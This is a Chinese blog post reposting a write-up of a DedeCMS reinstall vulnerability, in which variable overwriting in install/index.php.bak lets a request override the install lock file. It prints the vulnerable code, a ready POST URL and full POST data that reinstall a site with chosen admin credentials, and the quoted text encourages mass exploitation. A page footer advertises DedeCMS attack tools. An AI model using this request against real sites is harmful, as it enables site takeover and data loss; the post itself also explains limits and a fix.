`

织梦重装漏洞其实并不是那么好利用

阅读更多


这个重装漏洞的危害大家应该也知道,我就不多说了,估计又要一批站躺枪了,利用条件是webserver要求是存在apache解析漏洞和install文件夹存在。

利用截图:

\

Dedecms在安装后会把安装文件/install/index.php备份成/install/index.php.bak,这个在apache下面是会解析成PHP执行的。

看看/install/index.php.bak代码:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

$verMsg= ' V5.7 GBKSP1';
$s_lang= 'gb2312';
$dfDbname= 'dedecmsv57gbksp1';
$errmsg= '';
$install_demo_name= 'dedev57demo.txt';
$insLockfile= dirname(__FILE__)。'/install_lock.txt';
$moduleCacheFile= dirname(__FILE__)。'/modules.tmp.inc';
define('DEDEINC',dirname(__FILE__)。'//include');
define('DEDEDATA',dirname(__FILE__)。'//data');
define('DEDEROOT',preg_replace("#[\\\\\/]install#", '', dirname(__FILE__)));
header("Content-Type: text/html; charset={$s_lang}");
require_once(DEDEROOT.'/install/install.inc.php');
require_once(DEDEINC.'/zip.class.php');
foreach(Array('_GET','_POST','_COOKIE') as$_request)
{
foreach($$_requestas$_k=> $_v) ${$_k} = RunMagicQuotes($_v);
}
require_once(DEDEINC.'/common.func.php');
if(file_exists($insLockfile))
{
exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}
if(empty($step))
{
$step= 1;
}

其中$insLockfile = dirname(__FILE__)。’/install_lock.txt’;是安装锁文件。在下面的

if(file_exists($insLockfile))
{
exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}

这个代码的意思是:如果$insLockfile这个文件存在,那么就提示已经安装了,如果$insLockfile不存在,那么就可以继续安装,那么我们要控制$insLockfile才能重新安装,

关键的问题在这两段代码中间还有一段dedecms一直很二逼的变量覆盖的代码。

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}

这个是注册变量,如果存在变量就直接覆盖了。

所以我们直接在请求里加上insLockfile=seay就可以把$insLockfile变为seay,当然文件不存在的啦。就重装了。

利用演示:

直接POST数据到这个URL

http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4

就OK了

\

POST数据:

step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&adminuser=admin&adminpwd=admin&cookieencode=JzIVw7439H&webname=%CE%D2%B5%C4%CD%F8%D5%BE&adminmail=admin%40dedecms.com&baseurl=http%3A%2F%2Flocalhost&cmspath=%2Fdedecms

其中的dbhost啥的东西自己改改吧,

提交数据包。效果如下

\

重装了……我是良民

批量EXP就不写了,要玩的自己搞吧,exp google搜索批量,估计dedecms的站要废一大半。

解决方式:

删除install/install.php.bak 或者 改名为install/install.bak


以上是从网络上摘录的,其实要利用这个漏洞并不是那么容易,这边就涉及到了两个地方需要我们自己去通过别的途径是获取,一个就是该网站的数据库帐号和密码,另一个就是该网站的数据库名,否则就算你重新安装了也是不可能覆盖掉以前的数据库的,只能说是重新在该服务器上面创建了一个数据库,其实要获取到网站的数据库帐号和密码还是具有一定的难度的。不知道说得对不对,不对的可以指出,一起讨论一起进步。


本文出自 “庄金辉的个人博客” 博客,请务必保留此出处http://putian.blog.51cto.com/1722818/1232280
分享到:
评论

相关推荐

    织梦漏洞超级利用工具

    软件功能非常强大,懂的人可以拿去测试呵呵,不懂的人,你也就OUT了!~~

    织梦最新通杀利用工具.exe

    hacker,织梦 一款可以通杀织梦的攻击工具。

    织梦系统包装印刷营销网站模版

    【织梦系统包装印刷营销网站模版】是一个专为包装和印刷行业设计的网站模板,适用于企业进行在线营销和展示其产品与服务。这个模版基于织梦系统(DedeCMS),一个流行的开源内容管理系统,它以其易用性和灵活性而受...

    织梦dede5.8抢先体验版

    综上所述,织梦dede5.8抢先体验版是一个强调安全性和用户体验的新CMS版本,用户可以通过它提前了解和测试新功能,以期在正式版发布时能更好地利用这些改进来优化自己的网站。同时,了解其文件结构有助于我们理解织梦...

    织梦图片批量上传

    在织梦系统中,图片管理是内容创建不可或缺的一部分,因为网站的视觉效果往往依赖于高质量的图像。 首先,我们要理解“一键上传图片(仅本地跟七牛云)”这一标签的含义。这表明该压缩包提供的批量上传功能不仅支持...

    织梦密码重设工具.rar

    需要注意的是,虽然织梦密码重设工具提供了方便,但使用第三方工具修改系统核心文件始终存在风险,可能导致系统不稳定或安全漏洞。因此,使用前务必确保工具来源可靠,并备份好重要数据,以防万一。此外,定期更换...

    织梦标签 非常好

    织梦内容管理系统(DedeCMS)是一款广泛应用的开源CMS,其强大的标签系统是其核心功能之一。"织梦标签 非常好"这个标题和...通过深入学习和理解织梦标签,我们可以更好地利用这一工具,提升网站的用户体验和管理效率。

    织梦5[1].1-5.7漏洞利用合辑

    织梦5[1].1-5.7漏洞利用合辑,共享共享

    织梦标签助手2.1

    "织梦标签助手2.1"是一款专为织梦(DEDECMS)内容管理系统设计的辅助工具,旨在简化用户在创建和管理...配合详细的使用说明和额外的支持资源,用户可以更加便捷地掌握并利用这款工具,提升其在织梦平台上的工作效能。

    织梦 添加自由列表并进行操作

    标题中的“织梦添加自由列表并进行操作”指的是在DedeCMS(织梦内容管理系统)中创建自定义列表并对其进行管理的过程。DedeCMS是一款基于PHP+MySQL开发的内容管理系统,广泛应用于网站建设和维护。这个过程涉及到的...

    织梦定时审核定时发布插件.zip

    【织梦定时审核定时发布插件】是一款专为织梦内容管理系统(DedeCMS)设计的实用工具,它能够帮助网站管理员实现文章的...通过合理利用这款插件,可以更好地管理网站内容,提高用户体验,同时减轻管理员的工作负担。

    织梦手册,拿去吧!

    1. 安全设置:定期更新织梦程序到最新版本,防止被黑客利用漏洞攻击。 2. 防止SQL注入:避免在模板中直接使用用户提交的数据,应使用织梦提供的安全函数过滤输入。 3. 数据备份:定期备份数据库,以防数据丢失。 4. ...

    织梦excel导入数据库

    【织梦Excel导入数据库】是一项在网站管理中常见的任务,特别是在使用织梦(Dedecms)这样的内容管理系统时。织梦系统是一个基于PHP和MySQL的开源CMS,它提供了丰富的功能,包括文章发布、栏目管理以及模板设计等。...

    织梦多选功能修改

    在IT行业中,织梦(DedeCMS)是一款广泛使用的开源内容管理系统,专为网页建设和管理设计。本主题聚焦于“织梦多选功能修改”,这是一个关于如何增强织梦列表页筛选功能的技术点,特别是涉及多选筛选选项的优化。...

    织梦后台密码重置

    2. **上传文件**:将选择好的文件通过FTP工具上传到织梦系统的根目录下。确保文件位于网站根目录,而不是任何子目录中。 3. **访问重置链接**:上传完成后,打开浏览器,输入类似`...

    自适应织梦网站程序

    使用自适应织梦程序,开发人员可以利用其内置的模板系统快速搭建网站框架,并通过丰富的插件和模块扩展网站功能。例如,可以添加在线预约系统,让用户方便地预订瑜伽课程或预约美容服务;也可以集成会员系统,实现...

    织梦post登录发布.zip

    【标题】"织梦post登录发布.zip" 涉及的主要知识点是织梦内容管理系统(DedeCMS)的用户登录和文章...同时,通过深入研究压缩包内的文件,我们可以更深入地理解织梦系统的内部工作原理,从而更好地利用和优化其功能。

    织梦条件联合查询

    4. **执行SQL查询**:根据构建的SQL语句,织梦系统会向数据库发起查询,利用数据库的JOIN、WHERE等子句实现条件的联合。如果条件较多,可能需要用到AND、OR等逻辑运算符来组合不同条件。 5. **返回查询结果**:查询...

    茶叶公司织梦网站

    【标题】"茶叶公司织梦网站"所涉及的是一个基于织梦内容管理系统(DedeCMS)搭建的企业网站模板。织梦CMS是一款广泛使用的开源PHP+MySQL建站系统,以其功能强大、操作简单、模板丰富而受到众多中小型企业及个人站长...

    织梦dedecms转wordpress插件

    织梦dedecms转wordpress插件,该插件可以把织梦数据完整的转到wordpress并保持源链接不变不影响SEO,该插件可以把织梦的,系统参数、栏目分类、栏目内容、栏目TDK、文章内容、文章自定义字段、友情链接、一起转入到...

Global site tag (gtag.js) - Google Analytics